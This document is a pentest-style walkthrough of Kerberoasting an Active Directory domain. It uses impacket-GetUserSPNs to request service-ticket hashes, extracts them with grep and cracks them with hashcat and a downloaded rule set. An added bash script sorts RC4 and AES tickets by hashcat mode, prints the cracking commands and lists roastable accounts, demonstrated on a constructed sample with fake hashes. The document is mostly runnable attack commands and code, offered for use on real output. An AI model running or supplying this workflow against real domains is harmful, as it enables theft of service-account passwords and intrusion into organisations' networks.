Kerberoasting

Kerberoast all accounts with an SPN (password/NTLM authentication to the DC)

impacket-GetUserSPNs -request -save $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER | tee GetUserSPN-Output.txt

You are prompted for the password of $ADUSER. The table of Kerberoastable accounts and the $krb5tgs$ hashes go to both the terminal and GetUserSPN-Output.txt, which the following steps parse.

Extract only the ticket hashes for cracking

grep '^\$krb5tgs\$' GetUserSPN-Output.txt > kerb.hash

Crack tickets

wget https://github.com/stealthsploit/OneRuleToRuleThemStill/raw/refs/heads/main/OneRuleToRuleThemStill.rule
hashcat -m 13100 -a 0 kerb.hash rockyou.txt -r OneRuleToRuleThemStill.rule

The above is a proof of concept for cracking the hash. rockyou.txt with a large rule set on a CPU will take a long time, so I'd strongly recommend a proper GPU cracking setup; if you have access to powerful GPUs, take a look at NPK or VPK. Mode 13100 is for RC4 tickets, i.e. hash lines that start with $krb5tgs$23$. If the DC issues an AES ticket instead (the account does not support RC4), GetUserSPNs prints $krb5tgs$17$ (AES128, hashcat -m 19600) or $krb5tgs$18$ (AES256, hashcat -m 19700) hashes, which need the matching mode and crack far more slowly; check the prefix in kerb.hash before starting hashcat.

Create a CSV of Kerberoastable accounts

awk 'BEGIN{print "SPN,Username"} $1 ~ "/" && index($1,"$krb5tgs") != 1 {print $1","$2}' GetUserSPN-Output.txt > Kerberoastable-User-Account.csv

Table rows are selected by the SPN in the first column (the only column containing a "/"), and the hash lines are excluded explicitly. Grepping for CN= instead would silently drop every account whose MemberOf column is empty.
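As an added example (not code from the original page or from impacket), the script below ties the steps above together: it sorts the requested tickets into one file per encryption type so each file goes to hashcat with the correct mode, prints the hashcat command for each file, and builds the SPN CSV without dropping accounts that have no group membership. The GetUserSPNs output embedded in it is constructed, with shortened fake hash bodies; the file names, the rockyou.txt path and the rule file name are assumptions.

```bash
#!/usr/bin/env bash
# Added example, not from the original page: post-process GetUserSPNs -request
# output. Assumptions: the output was captured to a file (as with tee above),
# hash lines look like "$krb5tgs$<etype>$..." and table rows carry the SPN in
# column 1 and the sAMAccountName in column 2.
set -u

# Sort each $krb5tgs$ line into kerb-<hashcat mode>.hash under $2 so every
# file can be cracked with the matching mode:
# etype 23 (RC4) -> 13100, 17 (AES128) -> 19600, 18 (AES256) -> 19700.
split_by_etype() {
    local infile="$1" outdir="$2"
    mkdir -p "$outdir"
    awk -F'$' -v outdir="$outdir" '
        BEGIN { mode[23] = 13100; mode[17] = 19600; mode[18] = 19700 }
        $2 == "krb5tgs" {
            if (!($3 in mode)) { print "skipping unknown etype " $3 > "/dev/stderr"; next }
            print > (outdir "/kerb-" mode[$3] ".hash")
        }' "$infile"
}

# Print one hashcat command per hash file produced by split_by_etype.
# $1 = directory holding kerb-<mode>.hash files, $2 = wordlist, $3 = rule file.
crack_commands() {
    local dir="$1" wordlist="$2" rule="$3" f mode
    for f in "$dir"/kerb-*.hash; do
        [ -e "$f" ] || continue
        mode="${f##*/kerb-}"; mode="${mode%.hash}"
        printf 'hashcat -m %s -a 0 %s %s -r %s\n' "$mode" "$f" "$wordlist" "$rule"
    done
}

# Build the "SPN,Username" CSV from the table rows of the output in $1.
# A row is recognised by an SPN (contains "/") in column 1, so accounts with
# an empty MemberOf column are kept; hash lines also contain "/" and are
# excluded explicitly.
spn_csv() {
    awk 'BEGIN { print "SPN,Username" }
         $1 ~ "/" && index($1, "$krb5tgs") != 1 { print $1 "," $2 }' "$1"
}

# Constructed sample of GetUserSPNs -request output (hash bodies shortened and
# not real ticket data). Written to $1.
write_sample_output() {
    cat > "$1" <<'EOF'
ServicePrincipalName            Name     MemberOf                                    PasswordLastSet             LastLogon  Delegation
------------------------------  -------  ------------------------------------------  --------------------------  ---------  ----------
MSSQLSvc/sql01.corp.local:1433  svc_sql  CN=Domain Admins,CN=Users,DC=corp,DC=local  2023-01-10 09:12:00.000000  <never>
HTTP/web01.corp.local           svc_web                                              2022-05-02 15:30:00.000000  <never>
CIFS/fs01.corp.local            svc_bak                                              2021-11-20 08:00:00.000000  <never>

$krb5tgs$23$*svc_sql$CORP.LOCAL$CORP.LOCAL/svc_sql*$0a1b2c3d0a1b2c3d0a1b2c3d0a1b2c3d$deadbeef
$krb5tgs$23$*svc_web$CORP.LOCAL$CORP.LOCAL/svc_web*$1b2c3d4e1b2c3d4e1b2c3d4e1b2c3d4e$cafebabe
$krb5tgs$18$svc_bak$CORP.LOCAL$*CORP.LOCAL/svc_bak*$2c3d4e5f2c3d4e5f2c3d4e5f$feedface
EOF
}

# Demo run on the constructed sample: two RC4 tickets land in kerb-13100.hash,
# the AES256 ticket in kerb-19700.hash, and the CSV lists all three accounts.
demo_dir="$(mktemp -d)"
write_sample_output "$demo_dir/GetUserSPN-Output.txt"
split_by_etype "$demo_dir/GetUserSPN-Output.txt" "$demo_dir"
spn_csv "$demo_dir/GetUserSPN-Output.txt"
crack_commands "$demo_dir" rockyou.txt OneRuleToRuleThemStill.rule
```

Point split_by_etype at the real GetUserSPN-Output.txt and run the printed hashcat commands; the per-mode split is what stops an AES ticket from being fed to mode 13100 and rejected.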
